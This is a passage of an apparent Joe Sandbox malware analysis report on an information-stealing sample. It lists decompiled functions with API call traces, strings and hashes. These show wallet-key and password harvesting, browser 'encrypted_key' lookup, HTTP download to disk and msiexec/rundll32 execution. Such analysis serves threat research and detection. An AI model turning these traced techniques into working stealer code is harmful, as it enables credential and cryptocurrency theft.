                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExecuteShell$lstrcpy
                  • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                  • API String ID: 2507796910-3625054190
                  • Opcode ID: 43fe909789b7dc43659caa13511f4b8bf089a42b19b88e114b2236f0a9fca773
                  • Instruction ID: 7bb19d02a20cfde6e71349503514b664f3637a4f450ee8e2f711a5aabe20204f
                  • Opcode Fuzzy Hash: 43fe909789b7dc43659caa13511f4b8bf089a42b19b88e114b2236f0a9fca773
                  • Instruction Fuzzy Hash: 2812FD718111089ADB19FBA0DD92FEEB7B8AF14310F904199E50676191EF347BCACF62
                  Function 00B152C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B06280: InternetOpenA.WININET(00B20DFE,00000001,00000000,00000000,00000000), ref: 00B062E1
                    • Part of subcall function 00B06280: StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06303
                    • Part of subcall function 00B06280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B06335
                    • Part of subcall function 00B06280: HttpOpenRequestA.WININET(00000000,GET,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B06385
                    • Part of subcall function 00B06280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B063BF
                    • Part of subcall function 00B06280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B063D1
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00B15318
                  • lstrlen.KERNEL32(00000000), ref: 00B1532F
                    • Part of subcall function 00B18E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B18E52
                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00B15364
                  • lstrlen.KERNEL32(00000000), ref: 00B15383
                  • lstrlen.KERNEL32(00000000), ref: 00B153AE
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 3240024479-1526165396
                  • Opcode ID: 8ff83af3f92c61ee2b66e85e0baee734a60f29cc9361f37121531ce4a717a0a9
                  • Instruction ID: 29f432880e8927857f0760898773167f360855b3e072e71101a8c18c7190a94c
                  • Opcode Fuzzy Hash: 8ff83af3f92c61ee2b66e85e0baee734a60f29cc9361f37121531ce4a717a0a9
                  • Instruction Fuzzy Hash: F0510E30911148DBCB18FF64DD96AEE77B9EF50310F904498F40AAA591DF347B86CB62
                  Function 00B112D0 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen
                  • String ID:
                  • API String ID: 2001356338-0
                  • Opcode ID: 4bf50a0f88daec25723ca18ebae2ba638f3b27ac2a632c816aaba4b87f995e6e
                  • Instruction ID: 72851ade2cde3ff01ea18189e1d33499d095d02f34d3887b88f2b75f44de38d0
                  • Opcode Fuzzy Hash: 4bf50a0f88daec25723ca18ebae2ba638f3b27ac2a632c816aaba4b87f995e6e
                  • Instruction Fuzzy Hash: F0C1B4B59412199BCB14EF60DC89FEA73B8BF54300F4045D8F50AA7281EA70AAC5CFA1
                  Function 00B14280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B18DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B18E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00B142EC
                  • lstrcat.KERNEL32(?,011FDC28), ref: 00B1430B
                  • lstrcat.KERNEL32(?,?), ref: 00B1431F
                  • lstrcat.KERNEL32(?,011FCBA0), ref: 00B14333
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B18D90: GetFileAttributesA.KERNEL32(00000000,?,00B01B54,?,?,00B2564C,?,?,00B20E1F), ref: 00B18D9F
                    • Part of subcall function 00B09CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00B09D39
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                    • Part of subcall function 00B193C0: GlobalAlloc.KERNEL32(00000000,00B143DD,00B143DD), ref: 00B193D3
                  • StrStrA.SHLWAPI(?,011FDB50), ref: 00B143F3
                  • GlobalFree.KERNEL32(?), ref: 00B14512
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09AEF
                    • Part of subcall function 00B09AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00B04EEE,00000000,?), ref: 00B09B01
                    • Part of subcall function 00B09AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00B04EEE,00000000,00000000), ref: 00B09B2A
                    • Part of subcall function 00B09AC0: LocalFree.KERNEL32(?,?,?,?,00B04EEE,00000000,?), ref: 00B09B3F
                  • lstrcat.KERNEL32(?,00000000), ref: 00B144A3
                  • StrCmpCA.SHLWAPI(?,00B208D1), ref: 00B144C0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B144D2
                  • lstrcat.KERNEL32(00000000,?), ref: 00B144E5
                  • lstrcat.KERNEL32(00000000,00B20FB8), ref: 00B144F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                  • String ID:
                  • API String ID: 3541710228-0
                  • Opcode ID: ef19f767c697911159780f826ca3cbb6d4f3069f39494762cee0f58bc56d283f
                  • Instruction ID: 0d0753805446abd2602faf6dc289a0454f32f4f411858b9581be740b6e1156fe
                  • Opcode Fuzzy Hash: ef19f767c697911159780f826ca3cbb6d4f3069f39494762cee0f58bc56d283f
                  • Instruction Fuzzy Hash: A47146B6910208ABDB14EFE4DC85FEE77B9BB58300F4045D8F605A7181EA34DB45CBA1
                  Function 00B01310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B012A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B012B4
                    • Part of subcall function 00B012A0: RtlAllocateHeap.NTDLL(00000000), ref: 00B012BB
                    • Part of subcall function 00B012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00B012D7
                    • Part of subcall function 00B012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00B012F5
                    • Part of subcall function 00B012A0: RegCloseKey.ADVAPI32(?), ref: 00B012FF
                  • lstrcat.KERNEL32(?,00000000), ref: 00B0134F
                  • lstrlen.KERNEL32(?), ref: 00B0135C
                  • lstrcat.KERNEL32(?,.keys), ref: 00B01377
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B18B60: GetSystemTime.KERNEL32(00B20E1A,011FA058,00B205AE,?,?,00B013F9,?,0000001A,00B20E1A,00000000,?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B18B86
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00B01465
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B099EC
                    • Part of subcall function 00B099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B09A11
                    • Part of subcall function 00B099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B09A31
                    • Part of subcall function 00B099C0: ReadFile.KERNEL32(000000FF,?,00000000,00B0148F,00000000), ref: 00B09A5A
                    • Part of subcall function 00B099C0: LocalFree.KERNEL32(00B0148F), ref: 00B09A90
                    • Part of subcall function 00B099C0: CloseHandle.KERNEL32(000000FF), ref: 00B09A9A
                  • DeleteFileA.KERNEL32(00000000), ref: 00B014EF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                  • API String ID: 3478931302-218353709
                  • Opcode ID: 9f9a49e6e526b3c2e41ec26b6f8f8b011db426fb7ea3060999fd2960c8d4c48e
                  • Instruction ID: 3cb182d9eb898eee2b845940c2f966bd116c801351f374adcc7748a7a254a8a5
                  • Opcode Fuzzy Hash: 9f9a49e6e526b3c2e41ec26b6f8f8b011db426fb7ea3060999fd2960c8d4c48e
                  • Instruction Fuzzy Hash: A45103B1D5011957DB15FB60DD92AED73BCAF54310F8045D8B60AA2092EE306BCACBA6
                  Function 00B075D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B072D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B0733A
                    • Part of subcall function 00B072D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B073B1
                    • Part of subcall function 00B072D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B0740D
                    • Part of subcall function 00B072D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00B07452
                    • Part of subcall function 00B072D0: HeapFree.KERNEL32(00000000), ref: 00B07459
                  • lstrcat.KERNEL32(00000000,00B217FC), ref: 00B07606
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B07648
                  • lstrcat.KERNEL32(00000000, : ), ref: 00B0765A
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B0768F
                  • lstrcat.KERNEL32(00000000,00B21804), ref: 00B076A0
                  • lstrcat.KERNEL32(00000000,00000000), ref: 00B076D3
                  • lstrcat.KERNEL32(00000000,00B21808), ref: 00B076ED
                  • task.LIBCPMTD ref: 00B076FB
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                  • String ID: :
                  • API String ID: 2677904052-3653984579
                  • Opcode ID: adc2377613e57356b40aeee0e109ee403ac712616f872708144aada427a538b5
                  • Instruction ID: 7a6a8c066fad21f07df55415f63512eeece005bb25da50f1e55553c984705936
                  • Opcode Fuzzy Hash: adc2377613e57356b40aeee0e109ee403ac712616f872708144aada427a538b5
                  • Instruction Fuzzy Hash: 1F314B79D40609DBCB04EFE8DC95DEE7BB8EB49301B144198E106A72A0DE34AA46DB61
                  Function 00B18100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,011FD8E0,00000000,?,00B20E2C,00000000,?,00000000), ref: 00B18130
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B18137
                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00B18158
                  • __aulldiv.LIBCMT ref: 00B18172
                  • __aulldiv.LIBCMT ref: 00B18180
                  • wsprintfA.USER32 ref: 00B181AC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                  • String ID: %d MB$@
                  • API String ID: 2774356765-3474575989
                  • Opcode ID: 2965fede34af23eefb1fd9f45a6c3937c81fbcc26a48e0c4143a05fbf55508e9
                  • Instruction ID: 67f9c55e80755e404e645dff08834cf071aa9c25bdbb692d403e5ef6eafd7655
                  • Opcode Fuzzy Hash: 2965fede34af23eefb1fd9f45a6c3937c81fbcc26a48e0c4143a05fbf55508e9
                  • Instruction Fuzzy Hash: 15211AB1E44318ABDB00DFD8DC49FAEB7B8FB48B10F504649F605BB280D77869018BA5
                  Function 00B060A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                  • InternetOpenA.WININET(00B20DF7,00000001,00000000,00000000,00000000), ref: 00B0610F
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B06147
                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00B0618F
                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00B061B3
                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00B061DC
                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00B0620A
                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00B06249
                  • InternetCloseHandle.WININET(?), ref: 00B06253
                  • InternetCloseHandle.WININET(00000000), ref: 00B06260
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                  • String ID:
                  • API String ID: 2507841554-0
                  • Opcode ID: e66afc4a340ee9671ce61c045876a8265edd5c5a2bdced875eb5be912cbaf67f
                  • Instruction ID: 2de9723168e57e0760369a5ba899b56b754594dec8dbd53a255244238c7a2898
                  • Opcode Fuzzy Hash: e66afc4a340ee9671ce61c045876a8265edd5c5a2bdced875eb5be912cbaf67f
                  • Instruction Fuzzy Hash: E1513DB5940218ABDB20DF64DC49BEE7BF8FB44701F5080D8B605A72C1DB746A89CFA5
                  Function 00B072D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON
                  Download Yara Rule
                  APIs
                  • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00B0733A
                  • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00B073B1
                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00B0740D
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00B07452
                  • HeapFree.KERNEL32(00000000), ref: 00B07459
                  • task.LIBCPMTD ref: 00B07555
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
